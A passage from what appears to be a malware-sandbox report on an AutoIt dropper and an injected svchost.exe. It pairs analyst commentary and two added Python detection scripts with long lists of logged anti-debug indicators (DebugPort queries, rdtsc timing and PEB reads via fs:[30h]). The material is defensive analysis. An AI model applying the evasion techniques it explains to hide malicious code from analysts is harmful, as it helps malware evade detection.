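    m = ROW_RE.match(row.strip())
    if not m:
        return None
    rest = m.group("rest").replace("Jump to behavior", "").strip()  # drop link text
    rec = {"src": m.group("src"), "kind": "other", "text": rest}
    for kind, pat in PATTERNS.items():
        hit = pat.search(rest)
        if hit:
            rec["kind"] = kind
            for k, v in hit.groupdict().items():
                rec[k] = int(v) if k in INT_KEYS else float(v) if k == "pct" else v
            break
    return rec


def triage(rows, coverage_floor=5.0):
    """Group evasion evidence per process; coverage_floor (percent) is our own heuristic."""
    findings = defaultdict(lambda: defaultdict(list))
    for row in rows:
        rec = parse_row(row)
        if rec is None:
            continue
        f, kind = findings[rec["src"]], rec["kind"]
        if kind == "sandbox":
            f["sandbox_check"].append(rec["chain"])
        elif kind == "sleep_time" and abs(rec["val"]) >= abs(rec["thr"]):
            f["long_sleep"].append((rec["tid"], abs(rec["val"])))   # magnitudes, unit as reported
        elif kind == "sleep_count" and rec["val"] > rec["thr"]:
            f["sleep_loop"].append((rec["tid"], rec["val"]))
        elif kind == "coverage" and rec["pct"] < coverage_floor:
            f["low_api_coverage"].append(rec["pct"])
        elif kind == "query" and rec["info"] == "DebugPort":
            f["debugger_query"].append(rec["info"])
        elif kind == "code":
            body = rec["body"]
            if "fs:[00000030h]" in body:                  # TEB -> PEB pointer read
                f["peb_read"].append(rec["fid"])
            elif body == "rdtsc":                          # timing probe
                f["rdtsc_timing"].append(rec["fid"])
            else:                                          # plain API call chain
                apis = {a.strip() for a in body.split(",") if a.strip()}
                if {"FindFirstFileW", "Sleep"} <= apis:
                    f["slow_file_walk"].append(rec["fid"])
                if apis & {"IsWow64Process", "GetNativeSystemInfo"}:
                    f["host_fingerprint"].append(rec["fid"])
    return {src: dict(t) for src, t in findings.items()}


def rank(findings):
    """Processes ordered by how many distinct evasion tactics they show."""
    return sorted(((src, len(t)) for src, t in findings.items()), key=lambda x: (-x[1], x[0]))


if __name__ == "__main__":
    for src, n in rank(triage(SAMPLE_ROWS)):
        print(f"{n} tactic(s)  {src}")
```

Read the output per process, not per row: the injected svchost.exe shows the debugger-oriented set (DebugPort query, rdtsc, PEB reads) while the AutoIt-compiled dropper shows the foreground-window gate, the Sleep inside a FindFirstFileW loop and the IsWow64Process/GetNativeSystemInfo host fingerprint, which is the split the signatures above reflect. Two caveats the rows themselves do not state: the report's API coverage figure is low for any program that spends the run waiting, so it only corroborates the sleep and window gates; and the two "Hyper-V RAW" memory strings are the Winsock protocol-catalog entry for the AF_HYPERV provider in mswsock.dll, present in any process that initialised Winsock on a current Windows host, so on their own they are weak evidence of VM detection (the parser leaves such rows as kind "other").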
Source: C:\Windows\SysWOW64\svchost.exe	Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0337096E rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00417BA3 LdrLoadDll
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe	Code function: 0_2_0095EAA2 BlockInput
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe	Code function: 0_2_00912622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe	Code function: 0_2_008E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
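The DebugPort and rdtsc rows above and the "mov eax, dword ptr fs:[00000030h]" rows that follow are the three cheapest anti-debug primitives on 32-bit Windows: fs:[0x30] is the TEB slot holding the PEB pointer (PEB+0x02 is BeingDebugged, PEB+0x68 is NtGlobalFlag), DebugPort is the NtQueryInformationProcess class behind CheckRemoteDebuggerPresent, and rdtsc is the timer behind the "execution timing" checks. The scanner below is an added example, not part of the report: it recovers the two instruction-level indicators from raw bytes by decoding the 64 A1 disp32 and 64 8B /r encodings of mov r32, fs:[0x30] and the 0F 31 rdtsc opcode. The input is a hand-assembled stub constructed in build_sample(), not bytes from the analysed sample.

```python
"""Byte-level finder for the PEB-read and rdtsc instructions the report lists (added example)."""
import struct

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
TEB_PEB_OFFSET = 0x30  # fs:[0x30] = TEB.ProcessEnvironmentBlock on 32-bit Windows


def decode_at(buf, i):
    """Return (length, mnemonic) if a PEB read or rdtsc starts at buf[i], else None."""
    if buf[i:i + 2] == b"\x0f\x31":                       # rdtsc
        return 2, "rdtsc"
    if buf[i] != 0x64:                                    # FS segment-override prefix
        return None
    op = buf[i + 1:i + 2]
    if op == b"\xa1" and len(buf) >= i + 6:               # 64 A1 moffs32: mov eax, fs:[moffs32]
        if struct.unpack_from("<I", buf, i + 2)[0] == TEB_PEB_OFFSET:
            return 6, "mov eax, dword ptr fs:[00000030h]"
    elif op == b"\x8b" and len(buf) >= i + 7:             # 64 8B /r: mov r32, fs:[disp32]
        modrm = buf[i + 2]
        if modrm & 0xC7 == 0x05:                          # mod=00, rm=101: bare disp32
            if struct.unpack_from("<I", buf, i + 3)[0] == TEB_PEB_OFFSET:
                reg = REG32[(modrm >> 3) & 7]
                return 7, f"mov {reg}, dword ptr fs:[00000030h]"
    return None


def scan(buf):
    """Linear sweep over raw bytes; returns [(offset, mnemonic)]."""
    hits, i = [], 0
    while i < len(buf):
        d = decode_at(buf, i)
        if d:
            hits.append((i, d[1]))
            i += d[0]          # step over the instruction's own bytes, like a disassembler
        else:
            i += 1
    return hits


def summarize(hits):
    """Count the two indicator classes, the way the report tallies them per function."""
    peb = sum(1 for _, m in hits if m.startswith("mov "))
    return {"peb_read": peb, "rdtsc": len(hits) - peb}


def build_sample():
    """Hand-assembled 32-bit stub (constructed here, not bytes from the analysed sample)."""
    return (b"\x55\x8b\xec"                      # push ebp ; mov ebp, esp
            b"\x64\xa1\x30\x00\x00\x00"          # mov eax, fs:[30h]           PEB
            b"\x0f\xb6\x40\x02"                  # movzx eax, byte ptr [eax+2]  PEB.BeingDebugged
            b"\x64\x8b\x0d\x30\x00\x00\x00"      # mov ecx, fs:[30h]           PEB
            b"\x8b\x49\x68"                      # mov ecx, [ecx+68h]          PEB.NtGlobalFlag
            b"\x0f\x31"                          # rdtsc                       timing probe
            b"\x64\x8b\x05\x18\x00\x00\x00"      # mov eax, fs:[18h]           TEB self pointer, not a PEB read
            b"\xc9\xc3")                         # leave ; ret


if __name__ == "__main__":
    found = scan(build_sample())
    for off, mnem in found:
        print(f"{off:#06x}  {mnem}")
    print(summarize(found))
```

Tally hits per function, as the rows in this report do, rather than per binary: compilers and runtimes read the PEB for benign reasons (OS version fields, the default heap), so the AutoIt runtime in 3HnH4uJtE7.exe has its own fs:[30h] reads, and the two-byte 0F 31 pattern also occurs by chance inside immediates and data. The decoder covers 32-bit code only; 64-bit code reaches the PEB through gs:[0x60], and the 7FFE2220xxxx interceptor addresses listed above are 64-bit addresses, so that code path needs the gs-prefixed encodings.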
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe	Code function: 0_2_00904CE8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe	Code function: 0_2_00BE2CA8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe	Code function: 0_2_00BE2C48 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe	Code function: 0_2_00BE1638 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0340634F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332C310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03350310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336A30B mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D437C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03408324 mov eax, dword ptr fs:[00000030h] (3 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B035C mov eax, dword ptr fs:[00000030h] (5 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033FA352 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D8350 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h] (15 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03328397 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332E388 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335438F mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334E3F0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033663FF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DE3DB mov eax, dword ptr fs:[00000030h] (3 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D43D4 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033EC3CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B63C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332823B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0340625D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h] (12 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03334260 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332826B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332A250 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03336259 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033EA250 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B8243 mov eax, dword ptr fs:[00000030h] (1 occurrence); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033402A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034062D6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h] (5 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336E284 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B0283 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033402E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03360124 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03404164 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DA118 mov eax, dword ptr fs:[00000030h] (3 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033F0115 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h] (6 occurrences); mov ecx, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332C156 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C8158 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03336154 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h] (4 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B019F mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332A197 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034061E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03370185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033EC188 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D4180 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033601F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h] (4 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033F61C3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C6030 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332A020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332C020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B4000 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335C073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03332050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B6050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033F60B8 mov eax, dword ptr fs:[00000030h] (1 occurrence); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033280A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C80A8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333208A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332C0F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033720F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033380E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B60E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B20DE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336273C mov eax, dword ptr fs:[00000030h] (2 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AC730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336C720 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03330710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03360710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336C700 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03338770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]1_2_03340770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330750 mov eax, dword ptr fs:[00000030h]1_2_03330750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BE75D mov eax, dword ptr fs:[00000030h]1_2_033BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372750 mov eax, dword ptr fs:[00000030h]1_2_03372750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372750 mov eax, dword ptr fs:[00000030h]1_2_03372750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B4755 mov eax, dword ptr fs:[00000030h]1_2_033B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336674D mov esi, dword ptr fs:[00000030h]1_2_0336674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336674D mov eax, dword ptr fs:[00000030h]1_2_0336674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336674D mov eax, dword ptr fs:[00000030h]1_2_0336674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033307AF mov eax, dword ptr fs:[00000030h]1_2_033307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E47A0 mov eax, dword ptr fs:[00000030h]1_2_033E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D678E mov eax, dword ptr fs:[00000030h]1_2_033D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033347FB mov eax, dword ptr fs:[00000030h]1_2_033347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033347FB mov eax, dword ptr fs:[00000030h]1_2_033347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033527ED mov eax, dword ptr fs:[00000030h]1_2_033527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033527ED mov eax, dword ptr fs:[00000030h]1_2_033527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033527ED mov eax, dword ptr fs:[00000030h]1_2_033527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BE7E1 mov eax, dword ptr fs:[00000030h]1_2_033BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333C7C0 mov eax, dword ptr fs:[00000030h]1_2_0333C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B07C3 mov eax, dword ptr fs:[00000030h]1_2_033B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334E627 mov eax, dword ptr fs:[00000030h]1_2_0334E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03366620 mov eax, dword ptr fs:[00000030h]1_2_03366620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368620 mov eax, dword ptr fs:[00000030h]1_2_03368620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333262C mov eax, dword ptr fs:[00000030h]1_2_0333262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372619 mov eax, dword ptr fs:[00000030h]1_2_03372619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE609 mov eax, dword ptr fs:[00000030h]1_2_033AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03362674 mov eax, dword ptr fs:[00000030h]1_2_03362674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F866E mov eax, dword ptr fs:[00000030h]1_2_033F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F866E mov eax, dword ptr fs:[00000030h]1_2_033F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A660 mov eax, dword ptr fs:[00000030h]1_2_0336A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A660 mov eax, dword ptr fs:[00000030h]1_2_0336A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334C640 mov eax, dword ptr fs:[00000030h]1_2_0334C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033666B0 mov eax, dword ptr fs:[00000030h]1_2_033666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C6A6 mov eax, dword ptr fs:[00000030h]1_2_0336C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334690 mov eax, dword ptr fs:[00000030h]1_2_03334690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334690 mov eax, dword ptr fs:[00000030h]1_2_03334690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B06F1 mov eax, dword ptr fs:[00000030h]1_2_033B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B06F1 mov eax, dword ptr fs:[00000030h]1_2_033B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0336A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A6C7 mov eax, dword ptr fs:[00000030h]1_2_0336A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6500 mov eax, dword ptr fs:[00000030h]1_2_033C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336656A mov eax, dword ptr fs:[00000030h]1_2_0336656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336656A mov eax, dword ptr fs:[00000030h]1_2_0336656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336656A mov eax, dword ptr fs:[00000030h]1_2_0336656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338550 mov eax, dword ptr fs:[00000030h]1_2_03338550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338550 mov eax, dword ptr fs:[00000030h]1_2_03338550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033545B1 mov eax, dword ptr fs:[00000030h]1_2_033545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033545B1 mov eax, dword ptr fs:[00000030h]1_2_033545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B05A7 mov eax, dword ptr fs:[00000030h]1_2_033B05A7
